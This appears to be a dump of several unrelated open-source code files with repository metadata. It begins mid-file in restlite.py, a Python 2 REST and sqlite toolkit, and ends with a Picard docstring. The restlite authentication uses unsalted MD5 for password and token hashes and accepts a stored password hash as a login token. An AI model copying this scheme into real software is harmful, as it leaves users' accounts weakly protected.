is None: response = [] headers = env.get('RESPONSE_HEADERS', [('Content-Type', 'text/plain')]) headers.append( ('Accept-Charset', 'utf-8') ) orig = Cookie.SimpleCookie(); cookie = env['COOKIE'] if 'HTTP_COOKIE' in env: orig.load(env['HTTP_COOKIE']) map(lambda x: cookie.__delitem__(x), [x for x in orig if x in cookie and str(orig[x]) == str(cookie[x])]) if len(cookie): headers.extend([(x[0], x[1].strip()) for x in [str(y).split(':', 1) for y in cookie.itervalues()]]) start_response(env.get('RESPONSE_STATUS', '200 OK'), headers) if _debug: if response: print headers, '\n'+str(response)[:256] if type(response) == str: return [ response ] else: return "" start_response('404 Not Found', [('Content-Type', 'text/plain')]) return ['Use one of these URL forms\n ' + '\n '.join(str(x[0]) for x in routes)] return handler #------------------------------------------------------------------------------ # Representations: JSON, XML #------------------------------------------------------------------------------ def tojson(value): '''The function converts the supplied value to JSON representation. It assumes the unified list format of value. Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method. To be consistent with str(obj) function which uses obj.__str__() method if available, tojson() uses obj._json_() method if available on value. 
Otherwise it checks obj._list_() method if available to get the unified list format. Otherwise it assumes that the value is in unified list format. The _json_ and _list_ semantics allow you to customize the JSON representation of your object, if needed. >>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')]))) >>> tojson(value) '{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}' ''' def list2dict(value): if hasattr(value, '_json_') and callable(value._json_): return value._json_() if hasattr(value, '_list_') and callable(value._list_): value = value._list_() if isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], basestring): if isinstance(value[1], list): return {value[0]: [list2dict(x) for x in value[1]]} elif isinstance(value[1], tuple) and not [x for x in value[1] if not isinstance(x, tuple) or len(x) != 2 or not isinstance(x[0], basestring)]: return {value[0]: dict([(x[0], list2dict(x[1])) for x in value[1]])} else: return {value[0]: list2dict(value[1])} elif isinstance(value, tuple) and not [x for x in value if not isinstance(x, tuple) or len(x) != 2 or not isinstance(x[0], basestring)]: return dict([(x[0], list2dict(x[1])) for x in value]) elif isinstance(value, list): return [list2dict(x) for x in value] else: return value return json.dumps(list2dict(value)) def xml(value): '''The function converts the supplied value to XML representation. It assumes the unified list format of value. Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method. To be consistent with str(obj) function which uses obj.__str__() method if available, xml() uses obj._xml_() method if available on value. Otherwise it checks obj._list_() method if available to get the unified list format. Otherwise it assumes that the value is in unified list format. The _xml_ and _list_ semantics allow you to customize the XML representation of your object, if needed. >>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')]))) >>> xml(value) '<file><name>myfile.txt</name><acl><allow>kundan</allow><allow>admin</allow></acl></file>' ''' if hasattr(value, '_xml_') and callable(value._xml_): return value._xml_() if hasattr(value, '_list_') and callable(value._list_): value = value._list_() if isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], basestring): if value[1] is None: return '<%s />'%(value[0]) else: return '<%s>%s</%s>'%(value[0], xml(value[1]), value[0]) elif isinstance(value, list) or isinstance(value, tuple): return ''.join(xml(x) for x in value) else: return str(value) if value is not None else None def prettyxml(value): '''This function is similar to xml except that it invokes minidom's toprettyxml() function. Note that due to the addition of spaces even in text nodes of prettyxml result, you cannot use this reliably for structured data representation, and should use only for debug trace of XML. ''' return minidom.parseString(xml(value)).toprettyxml().encode('utf-8') def represent(value, mime_type='*/*'): '''You can use this method to convert a unified value to JSON, XML or text based on the mime_type. The JSON representation is preferred if mime_type is default, otherwise the mime_type values of "application/json", "text/xml" and "text/plain" map to tojson, xml and str functions, respectively. 
If you would like to customize the representation of your object, you can define _json_(), _xml_() and/or __str__() methods on your object. Note that _json_ and _xml_ fall back to _list_ if available for getting the unified list representation, and __str__ falls back to __repr__ if available. The return value is a tuple containing mime_type and value. >>> class user: ... def __init__(self, name): self.name = name ... def _list_(self): return ('allow', self.name) >>> u1, u2 = user('kundan'), user('admin') >>> value = ('file', (('name', 'myfile.txt'), ('acl', [u1, u2]))) >>> represent(value, mime_type='application/json')[1] '{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}' >>> represent(value, mime_type='text/xml')[1] '<file><name>myfile.txt</name><acl><allow>kundan</allow><allow>admin</allow></acl></file>' ''' types = map(lambda x: x.lower(), re.split(r'[, \t]+', mime_type)) if '*/*' in types: types.append(defaultType) for mime_type, func in (('application/json', tojson), ('text/xml', xml), ('text/plain', str)): if mime_type in types: return (mime_type, func(value)) return ('application/octet-stream', str(value)) #------------------------------------------------------------------------------ # High Level API: @resources #------------------------------------------------------------------------------ class Request(dict): '''A request object is supplied to the resource definition in various methods: GET, PUT, POST, DELETE. It is a dictionary containing env information. Additionally, all the matching attributes from the router are stored as properties of this object, extracted from env['wsgiorg.routing_args'].''' def __init__(self, env, start_response): self.update(env.iteritems()) self.__dict__.update(env.get('wsgiorg.routing_args', {})) self.start_response = start_response def response(self, value, mime_type=None): mime_type, result = represent(value, mime_type if mime_type is not None else self.get('ACCEPT', defaultType)) self.start_response('200 OK', [('Content-Type', mime_type)]) return result class Status(Exception): '''The exception object that is used to throw HTTP response exception, e.g., raise Status, '404 Not Found'. The resource definition can throw this exception. ''' def resource(func): '''A decorator to convert a function with nested function GET, PUT, POST and/or DELETE to a resource. The resource object allows you to write applications in high-level semantics and translate it to wsgiref compatible handler that is handled the router. The GET and DELETE methods take one argument (request) of type Request, whereas PUT and POST take additional argument (first is request of type Request, and second is) entity extracted from message body. Note that the function definition that is made as a resource, must have a "return locals()" at the end so that all the methods GET, PUT, POST and/or DELETE are returned when function is called with no arguments. >>> @resource ... def files(): ... def GET(request): ... return represent(('files', [('file', 'myfile.txt')]), type='text/xml')[1] ... def PUT(request, entity): ... pass ... 
return locals() >>> # test using the following code >>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y) >>> print files(env, start_response) ['<files><file>myfile.txt</file></files>'] ''' method_funcs = func() if method_funcs is None: raise Status, '500 No "return locals()" in the definition of resource "%r"'%(func.__name__) def handler(env, start_response): if env['REQUEST_METHOD'] not in method_funcs: raise Status, '405 Method Not Allowed' req = Request(env, start_response) if env['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE'): result = method_funcs[env['REQUEST_METHOD']](req) elif env['REQUEST_METHOD'] in ('POST', 'PUT'): if 'BODY' not in env: try: env['BODY'] = env['wsgi.input'].read(int(env['CONTENT_LENGTH'])) except (TypeError, ValueError): raise Status, '400 Invalid Content-Length' if env['CONTENT_TYPE'].lower() == 'application/json' and env['BODY']: try: env['BODY'] = json.loads(env['BODY']) except: raise Status, '400 Invalid JSON content' result = method_funcs[env['REQUEST_METHOD']](req, env['BODY']) return [result] if result is not None else [] return handler def bind(obj): '''Bind the given object to a resource. It returns a wsgiref compliant application for that resource. Suppose an object obj={'kundan': user1, 'singh': user2} is bound to a resource '/users' then GET, PUT, POST and DELETE are implemented on that obj as 'GET /users' returns the obj description with its properties and methods. 'GET /users/kundan' returns the user1 object description. 'PUT /users/kundan' replaces user1 with the supplied value. 'POST /users' adds a new property, attribute or list element. ''' def handler(env, start_response): current, result = obj, None if env['REQUEST_METHOD'] == 'GET': while env['PATH_INFO']: print 'path=', env['PATH_INFO'] part, index = None, env['PATH_INFO'].find('/', 1) if index < 0: index = len(env['PATH_INFO']) part, env['SCRIPT_NAME'], env['PATH_INFO'] = env['PATH_INFO'][1:index], env['SCRIPT_NAME'] + env['PATH_INFO'][:index], env['PATH_INFO'][index:] if not part: break if current is None: raise Status, '404 Object Not Found' try: current = current[int(part)] if isinstance(current, list) else current[part] if isinstance(current, dict) else current.__dict__[part] if hasattr(current, part) else None except: print sys.exc_info(); raise Status, '400 Invalid Scope %r'%(part,) if current is None: result = None elif isinstance(current, list): result = [('url', '%s/%d'%(env['SCRIPT_NAME'], i,)) for i in xrange(len(current))] elif isinstance(current, dict): result = tuple([(k, v if isinstance(v, basestring) else '%s/%s'%(env['SCRIPT_NAME'], k)) for k, v in current.iteritems()]) else:result = current mime_type, value = represent(('result', result), mime_type=env.get('ACCEPT', 'application/json')) start_response('200 OK', [('Content-Type', mime_type)]) return [value] else: raise Status, '405 Method Not Allowed' return handler #------------------------------------------------------------------------------ # Data Model with sqlite3 #------------------------------------------------------------------------------ class Model(dict): '''A data model that abstracts the SQL table creation and uses sqlite3. Instead of defining a ORM (object-relation mapping), this just lets the application handle the SQL commands. 
The only convenience of this class is to allow creating the SQL tables using text description of the data model, define python class for each table that can constructed using all the values of a row of that table, and define sql and sql1 convenience methods. >>> desc = """ ... user ... id integer primary key ... name text ... ... files ... id integer primary key ... name text not null ... owner int ... created datetime ... size int default 0 ... foreign key (owner) references user(id) ... """ >>> m1 = Model() >>> m1.create(desc) >>> c1 = m1.sql('INSERT INTO user VALUES (NULL, ?)', ('Kundan Singh',)) >>> c2 = m1.sql('INSERT INTO user VALUES (NULL, ?)', ('Alok Singh',)) >>> row = m1.sql1('SELECT * FROM user WHERE id=?', (1,)) >>> u1 = m1['user'](*row) >>> print u1 'id'=1, 'name'=u'Kundan Singh' >>> print u1._list_() ('user', (('id', 1), ('name', u'Kundan Singh'))) >>> print 'table=%r attrs=%r properties=%r'%(u1.__class__._table_, u1.__class__._attrs_, u1.__dict__) table='user' attrs=['id', 'name'] properties={'id': 1, 'name': u'Kundan Singh'} ''' def __init__(self, conn=None): '''Construct the model using optional sqlite3 connection. If missing, use a in-memory database.''' if conn is None: self.conn = sqlite3.connect(':memory:') self.conn.isolation_level = None else: self.conn = conn def close(self): '''Close the connection with the database.''' self.conn.close() self.conn = None def sql(self, *args): '''Execute a single SQL command and return the cursor. For select commands application should use the cursor as an iterator, or invoke fetchone or fetchall as applicable.''' if _debug: print 'SQL: ' + ': '.join(map(str, args)) return self.conn.execute(*args) def sql1(self, *args): '''Execute a single SELECT SQL command and return a single row of the result.''' return self.sql(*args).fetchone() def create(self, data_model, createTable=True, createType=True): '''Create the SQL tables using the data_model text description. An example text description is shown below. It defines two tables, user and files. Note that the primary key of id must be defined as "integer" instead of "int" or other variation for auto-increment of the id to work. 
''' # list of tuples (table-name, [list of attributes]) tables = [(x[0], [y.strip() for y in x[1:]]) for x in (z.split('\n') for z in re.split(r'\r?\n\r?\n', re.sub(r'[ \t]{2,}', ' ', '\n'.join(map(str.rstrip, data_model.strip().split('\n'))))))] if createTable: map(lambda t: self.sql("CREATE TABLE %s (%s)"%(t[0], ', '.join(t[1]))), tables) if createType: for name, attrs in tables: class klass(object): _defn_ = [(y, z) for y, z in (x.split(' ', 1) for x in attrs) if y.lower() not in ('foreign', 'primary', 'key')] __doc__ = name + '\n ' + '\n '.join(['%s\t%s'%(x, y) for x, y in _defn_]) #@ReservedAssignment _table_, _attrs_, _defn_ = name, [x for x, y in _defn_], [y for x, y in _defn_] def __init__(self, *args, **kwargs): keys = self.__class__._attrs_ for x in keys: self.__dict__[x] = None for x, y in zip(keys[:len(args)], args): self.__dict__[x] = y for k, v in kwargs.iteritems(): self.__dict__[k] = v def __str__(self): return ', '.join(['%r=%r'%(x, self.__dict__[x]) for x in self.__class__._attrs_ if x in self.__dict__]) def _list_(self): return (self.__class__._table_, tuple((k, self.__dict__[k]) for k in self.__class__._attrs_ if k in self.__dict__)) self[name] = klass #------------------------------------------------------------------------------ # Authentication #------------------------------------------------------------------------------ _loginTable = ''' user_login id integer primary key email text not null realm text not null auth_hash tinyblob(32) not null token tinyblob(32) ''' class AuthModel(Model): '''Authenticated Model class, which creates a database table of type user_login and uses that to provide various authentication methods.''' def __init__(self, conn=None): Model.__init__(self, conn) self.mypass = hashlib.md5(str(id(self)) + str(time.time())).hexdigest() self.create(_loginTable) def auth_hash(self, email, realm, password): return hashlib.md5('%s:%s:%s'%(email, realm, password)).hexdigest() def token(self, user_id): tm = '%010x'%(int(time.time()),) return hashlib.md5(self.mypass + str(user_id) + tm).hexdigest() + tm def valid(self, user_id, token): auth_hash, tm = token[:-10], token[-10:] return hashlib.md5(self.mypass + str(user_id) + tm).hexdigest() == auth_hash def register(self, email, realm, password='', auth_hash=None): if not auth_hash: auth_hash = self.auth_hash(email, realm, password) self.sql('INSERT INTO user_login VALUES (NULL, ?, ?, ?, NULL)', (email, realm, auth_hash)) user_id = self.sql1('SELECT last_insert_rowid()')[0] self.sql('UPDATE user_login SET token=? WHERE id=?', (self.token(user_id), user_id)) return user_id def login(self, request): hdr = request.get('HTTP_AUTHORIZATION', None) if hdr: method, value = map(str.strip, hdr.split(' ', 1)) if method == 'Basic': email, password = base64.b64decode(value).split(':', 1) found = self.sql1('SELECT id, auth_hash FROM user_login WHERE email=?', (email,)) if not found: request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%('localhost',))]) raise Status, '401 Not Found' user_id, auth_hash = found; realm = "localhost" # TODO: implement this hash_recv = self.auth_hash(email, realm, password) if auth_hash != hash_recv: request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' token = self.token(user_id) self.sql('UPDATE user_login SET token=? 
WHERE id=?', (token, user_id)) request['COOKIE']['token'] = token; request['COOKIE']['token']['path'] = '/' request['COOKIE']['user_id'] = user_id; request['COOKIE']['user_id']['path'] = '/' return (user_id, email, token) elif (hasattr(request, 'user_id') or hasattr(request, 'email')) and hasattr(request, 'token'): if request.email == 'admin': adminhash = hashlib.md5('%s::%s'%(request.email, self.mypass)).hexdigest() print request.token, adminhash if adminhash != request.token: raise Status, '401 Not Authorized' user_id, email, token = 0, request.email, adminhash else: found = self.sql1('SELECT id, email, token FROM user_login WHERE (id=? OR email=?) AND (token=? OR auth_hash=?)', (request.user_id, request.email, request.token, request.token)) if not found: if not self.sql1('SELECT id FROM user_login WHERE id=? OR email=?', (request.user_id, request.email)): raise Status, '404 Not Found' else: raise Status, '401 Unauthorized' user_id, email, token = int(found[0]), found[1], found[2] if token != request.token: token = self.token(user_id) self.sql('UPDATE user_login SET token=? WHERE id=?', (token, user_id)) request['COOKIE']['token'] = token; request['COOKIE']['token']['path'] = '/' request['COOKIE']['user_id'] = user_id; request['COOKIE']['user_id']['path'] = '/' return (user_id, email, token) elif 'COOKIE' in request and 'user_id' in request['COOKIE'] and 'token' in request['COOKIE']: user_id, token = int(request['COOKIE'].get('user_id').value), request['COOKIE'].get('token').value if user_id == 0: email = 'admin'; auth_hash = hashlib.md5('%s::%s'%(email, self.mypass)).hexdigest() if auth_hash != token: raise Status, '401 Not Authorized as Admin' else: found = self.sql1('SELECT email FROM user_login WHERE id=? AND token=?', (user_id, token)) if not found: request['COOKIE']['user_id']['expires'] = 0 request['COOKIE']['user_id']['path'] = '/' request['COOKIE']['token']['expires'] = 0 request['COOKIE']['token']['path'] = '/' realm = "localhost" request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' email = found[0] return (user_id, email, token) else: realm = "localhost" request.start_response('401 Unauthorized', [('WWW-Authenticate', 'Basic realm="%s"'%(realm,))]) raise Status, '401 Unauthorized' def logout(self, request): if 'COOKIE' in request and 'user_id' in request['COOKIE'] and 'token' in request['COOKIE']: user_id, token, request['COOKIE']['token']['expires'] = request['COOKIE']['user_id'].value, request['COOKIE']['token'].value, 0 if user_id != 0: self.sql('UPDATE user_login SET token=NULL WHERE id=? AND token=?', (user_id, token)) #------------------------------------------------------------------------------ # Test and Examples #------------------------------------------------------------------------------ if __name__ == '__main__': import doctest _debug = False doctest.testmod()
repo_name: lbovet/platane | path: restlite.py | language: Python | license: lgpl-3.0 | size: 29,388 | score: 0.010617
import smbus, sys
import time

bus = smbus.SMBus(1)

# i2c address
address = 0x04

if len(sys.argv) < 3:
    print -1
    sys.exit()

cmd = sys.argv[1]
msg = sys.argv[2]
msAr = []
for x in msg:
    msAr.append(ord(x))


def writeNumber():
    #bus.write_byte(address, value)
    bus.write_i2c_block_data(address, ord(cmd), msAr)
    return -1


def readNumber():
    number = bus.read_byte(address)
    # number = bus.read_byte_data(address, 1)
    return number


writeNumber()
# sleep one second
time.sleep(1)
res = readNumber()
print res
repo_name: a2ron44/alfredHomeAutomation | path: alfredPHP/controller.py | language: Python | license: gpl-3.0 | size: 539 | score: 0.012987
# encoding=utf-8
import sqlalchemy
from sqlalchemy.engine import create_engine
from sqlalchemy.pool import SingletonThreadPool

from terroroftinytown.tracker.model import Session, Base


class Database(object):
    def __init__(self, path, delete_everything=False):
        if path.startswith('sqlite:'):
            self.engine = create_engine(path, poolclass=SingletonThreadPool)
            sqlalchemy.event.listen(
                self.engine, 'connect', self._apply_pragmas_callback)
        else:
            self.engine = create_engine(path)

        Session.configure(bind=self.engine)

        if delete_everything == 'yes-really!':
            self._delete_everything()

        Base.metadata.create_all(self.engine)

    @classmethod
    def _apply_pragmas_callback(cls, connection, record):
        connection.execute('PRAGMA journal_mode=WAL')
        connection.execute('PRAGMA synchronous=NORMAL')

    def _delete_everything(self):
        Base.metadata.drop_all(self.engine)
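A hypothetical instantiation of the tracker Database above; the connection URLs are placeholders and the sketch assumes the terroroftinytown package (and its model module) is importable:

# Hypothetical instantiation; URLs are placeholders.
from terroroftinytown.tracker.database import Database

db = Database('sqlite:///tracker.db')   # SQLite URL: WAL pragmas applied via the connect listener
# db = Database('postgresql://user:pass@localhost/tracker')   # other engines skip the pragma hook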
repo_name: hugovk/terroroftinytown | path: terroroftinytown/tracker/database.py | language: Python | license: mit | size: 992 | score: 0
import os

CACHE_TYPE = os.environ.get('CACHE_TYPE', 'redis').strip()

if CACHE_TYPE == 'redis':
    CACHES = {
        'default': {
            'BACKEND': 'django_redis.cache.RedisCache',
            'LOCATION': os.environ.get('CACHE_URL', 'redis://redis:6379/1').strip(),
            'OPTIONS': {
                'CLIENT_CLASS': 'django_redis.client.DefaultClient',
                'PICKLE_VERSION': 2,
                'SERIALIZER': 'astrobin.cache.CustomPickleSerializer',
            },
            'KEY_PREFIX': 'astrobin'
        }
    }
elif CACHE_TYPE == 'locmem':
    CACHES = {
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        }
    }
else:
    CACHES = {
        'default': {
            'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        }
    }
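A brief sketch of how Django code would exercise whichever backend the settings above select; the key and value are placeholders, and the snippet assumes Django settings are already configured:

# Hypothetical cache round-trip; works against redis or locmem, and silently
# no-ops with the dummy backend chosen when CACHE_TYPE is unrecognized.
from django.core.cache import cache

cache.set('example-key', {'hits': 1}, timeout=60)
print(cache.get('example-key'))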
repo_name: astrobin/astrobin | path: astrobin/settings/components/caches.py | language: Python | license: agpl-3.0 | size: 824 | score: 0.002427
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.

from . import mrp_document
from . import mrp_abstract_workorder
from . import res_config_settings
from . import mrp_bom
from . import mrp_routing
from . import mrp_workcenter
from . import mrp_production
from . import stock_traceability
from . import mrp_unbuild
from . import mrp_workorder
from . import product
from . import res_company
from . import stock_move
from . import stock_picking
from . import stock_production_lot
from . import stock_rule
from . import stock_scrap
from . import stock_warehouse
t3dev/odoo
addons/mrp/models/__init__.py
Python
gpl-3.0
608
0
# -*- coding: utf-8 -*- # # Copyright: (c) 2018, F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import json import pytest import sys if sys.version_info < (2, 7): pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7") from ansible.module_utils.basic import AnsibleModule try: from library.modules.bigiq_device_facts import Parameters from library.modules.bigiq_device_facts import SystemInfoFactManager from library.modules.bigiq_device_facts import ModuleManager from library.modules.bigiq_device_facts import ArgumentSpec # In Ansible 2.8, Ansible changed import paths. from test.units.compat import unittest from test.units.compat.mock import Mock from test.units.compat.mock import patch from test.units.modules.utils import set_module_args except ImportError: from ansible.modules.network.f5.bigiq_device_facts import Parameters from ansible.modules.network.f5.bigiq_device_facts import SystemInfoFactManager from ansible.modules.network.f5.bigiq_device_facts import ModuleManager from ansible.modules.network.f5.bigiq_device_facts import ArgumentSpec # Ansible 2.8 imports from units.compat import unittest from units.compat.mock import Mock from units.compat.mock import patch from units.modules.utils import set_module_args fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') fixture_data = {} def load_fixture(name): path = os.path.join(fixture_path, name) if path in fixture_data: return fixture_data[path] with open(path) as f: data = f.read() try: data = json.loads(data) except Exception: pass fixture_data[path] = data return data class TestParameters(unittest.TestCase): def test_module_parameters(self): args = dict( gather_subset=['system-info'], ) p = Parameters(params=args) assert p.gather_subset == ['system-info'] class TestManager(unittest.TestCase): def setUp(self): self.spec = ArgumentSpec() def test_get_facts(self, *args): set_module_args(dict( gather_subset=['system-info'], provider=dict( server='localhost', password='password', user='admin' ) )) fixture1 = load_fixture('load_shared_system_setup_1.json') module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) tm = SystemInfoFactManager(module=module) tm.read_collection_from_device = Mock(return_value=fixture1) # Override methods to force specific logic in the module to happen mm = ModuleManager(module=module) mm.get_manager = Mock(return_value=tm) results = mm.exec_module() assert results['changed'] is True assert 'system_info' in results
helldorado/ansible
test/units/modules/network/f5/test_bigiq_device_facts.py
Python
gpl-3.0
3,123
0.00064
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto  # type: ignore


__protobuf__ = proto.module(
    package="google.cloud.securitycenter.v1p1beta1",
    manifest={"Source",},
)


class Source(proto.Message):
    r"""Security Command Center finding source. A finding source is an
    entity or a mechanism that can produce a finding. A source is like a
    container of findings that come from the same scanner, logger,
    monitor, etc.

    Attributes:
        name (str):
            The relative resource name of this source. See:
            https://cloud.google.com/apis/design/resource_names#relative_resource_name
            Example:
            "organizations/{organization_id}/sources/{source_id}".
        display_name (str):
            The source's display name.
            A source's display name must be unique amongst its siblings,
            for example, two sources with the same parent can't share the
            same display name. The display name must have a length
            between 1 and 64 characters (inclusive).
        description (str):
            The description of the source (max of 1024 characters).
            Example: "Web Security Scanner is a web security scanner for
            common vulnerabilities in App Engine applications. It can
            automatically scan and detect four common vulnerabilities,
            including cross-site-scripting (XSS), Flash injection, mixed
            content (HTTP in HTTPS), and outdated/insecure libraries.".
        canonical_name (str):
            The canonical name of the finding. It's either
            "organizations/{organization_id}/sources/{source_id}",
            "folders/{folder_id}/sources/{source_id}" or
            "projects/{project_number}/sources/{source_id}",
            depending on the closest CRM ancestor of the resource
            associated with the finding.
    """

    name = proto.Field(proto.STRING, number=1,)
    display_name = proto.Field(proto.STRING, number=2,)
    description = proto.Field(proto.STRING, number=3,)
    canonical_name = proto.Field(proto.STRING, number=14,)


__all__ = tuple(sorted(__protobuf__.manifest))
googleapis/python-securitycenter
google/cloud/securitycenter_v1p1beta1/types/source.py
Python
apache-2.0
2,762
0.000362
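The source.py record above defines a proto-plus message with four string fields. A hedged construction sketch follows; the organization and source ids are placeholders, and it assumes the generated google-cloud-securitycenter package (which re-exports the manifest entries from its types package) is installed.

from google.cloud.securitycenter_v1p1beta1.types import Source

# Placeholder resource ids, for illustration only.
src = Source(
    name="organizations/123/sources/456",
    display_name="Example Scanner",
    description="Illustrative source record",
)
print(src.display_name)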
# Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.api.compute import base from tempest.common.utils import data_utils from tempest import exceptions from tempest import test from tempest.test import attr from tempest.test import skip_because class ServersAdminV3Test(base.BaseV3ComputeAdminTest): """ Tests Servers API using admin privileges """ _interface = 'json' @classmethod def setUpClass(cls): super(ServersAdminV3Test, cls).setUpClass() cls.client = cls.servers_admin_client cls.non_admin_client = cls.servers_client cls.flavors_client = cls.flavors_admin_client cls.s1_name = data_utils.rand_name('server') resp, server = cls.create_test_server(name=cls.s1_name, wait_until='ACTIVE') cls.s1_id = server['id'] cls.s2_name = data_utils.rand_name('server') resp, server = cls.create_test_server(name=cls.s2_name, wait_until='ACTIVE') cls.s2_id = server['id'] def _get_unused_flavor_id(self): flavor_id = data_utils.rand_int_id(start=1000) while True: try: resp, body = self.flavors_client.get_flavor_details(flavor_id) except exceptions.NotFound: break flavor_id = data_utils.rand_int_id(start=1000) return flavor_id @attr(type='gate') def test_list_servers_by_admin(self): # Listing servers by admin user returns empty list by default resp, body = self.client.list_servers_with_detail() servers = body['servers'] self.assertEqual('200', resp['status']) self.assertEqual([], servers) @test.skip_because(bug='1265416') @attr(type='gate') def test_list_servers_by_admin_with_all_tenants(self): # Listing servers by admin user with all tenants parameter # Here should be listed all servers params = {'all_tenants': ''} resp, body = self.client.list_servers_with_detail(params) servers = body['servers'] servers_name = map(lambda x: x['name'], servers) self.assertIn(self.s1_name, servers_name) self.assertIn(self.s2_name, servers_name) @attr(type='gate') def test_admin_delete_servers_of_others(self): # Administrator can delete servers of others _, server = self.create_test_server() resp, _ = self.client.delete_server(server['id']) self.assertEqual('204', resp['status']) self.servers_client.wait_for_server_termination(server['id']) @attr(type='gate') def test_delete_server_while_in_error_state(self): # Delete a server while it's VM state is error resp, server = self.create_test_server(wait_until='ACTIVE') resp, body = self.client.reset_state(server['id'], state='error') self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(server['id']) self.assertEqual(server['status'], 'ERROR') resp, _ = self.client.delete_server(server['id']) self.assertEqual('204', resp['status']) @attr(type='gate') def test_reset_state_server(self): # Reset server's state to 'error' resp, server = self.client.reset_state(self.s1_id) self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ERROR') # Reset server's state to 'active' resp, server = self.client.reset_state(self.s1_id, state='active') 
self.assertEqual(202, resp.status) # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ACTIVE') @attr(type='gate') @skip_because(bug="1240043") def test_get_server_diagnostics_by_admin(self): # Retrieve server diagnostics by admin user resp, diagnostic = self.client.get_server_diagnostics(self.s1_id) self.assertEqual(200, resp.status) basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop', 'tx_packets', 'tx_errors', 'tx_drop', 'read_req', 'write_req', 'cpu', 'memory'] for key in basic_attrs: self.assertIn(key, str(diagnostic.keys())) @attr(type='gate') def test_list_servers_filter_by_error_status(self): # Filter the list of servers by server error status params = {'status': 'error'} resp, server = self.client.reset_state(self.s1_id, state='error') resp, body = self.non_admin_client.list_servers(params) # Reset server's state to 'active' resp, server = self.client.reset_state(self.s1_id, state='active') # Verify server's state resp, server = self.client.get_server(self.s1_id) self.assertEqual(server['status'], 'ACTIVE') servers = body['servers'] # Verify error server in list result self.assertIn(self.s1_id, map(lambda x: x['id'], servers)) self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers)) @attr(type='gate') def test_rebuild_server_in_error_state(self): # The server in error state should be rebuilt using the provided # image and changed to ACTIVE state # resetting vm state require admin priviledge resp, server = self.client.reset_state(self.s1_id, state='error') self.assertEqual(202, resp.status) resp, rebuilt_server = self.non_admin_client.rebuild( self.s1_id, self.image_ref_alt) self.addCleanup(self.non_admin_client.wait_for_server_status, self.s1_id, 'ACTIVE') self.addCleanup(self.non_admin_client.rebuild, self.s1_id, self.image_ref) # Verify the properties in the initial response are correct self.assertEqual(self.s1_id, rebuilt_server['id']) rebuilt_image_id = rebuilt_server['image']['id'] self.assertEqual(self.image_ref_alt, rebuilt_image_id) self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id']) self.non_admin_client.wait_for_server_status(rebuilt_server['id'], 'ACTIVE', raise_on_error=False) # Verify the server properties after rebuilding resp, server = self.non_admin_client.get_server(rebuilt_server['id']) rebuilt_image_id = server['image']['id'] self.assertEqual(self.image_ref_alt, rebuilt_image_id)
ntymtsiv/tempest
tempest/api/compute/v3/admin/test_servers.py
Python
apache-2.0
7,222
0
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2008 Lukáš Lalinský
# Copyright (C) 2013, 2018-2021 Laurent Monin
# Copyright (C) 2017 Sambhav Kothari
# Copyright (C) 2018-2019 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

"""Tom's lossless Audio Kompressor streams with APEv2 tags.

TAK is a lossless audio compressor developed by Thomas Becker.

For more information, see http://wiki.hydrogenaudio.org/index.php?title=TAK
and http://en.wikipedia.org/wiki/TAK_(audio_codec)
"""

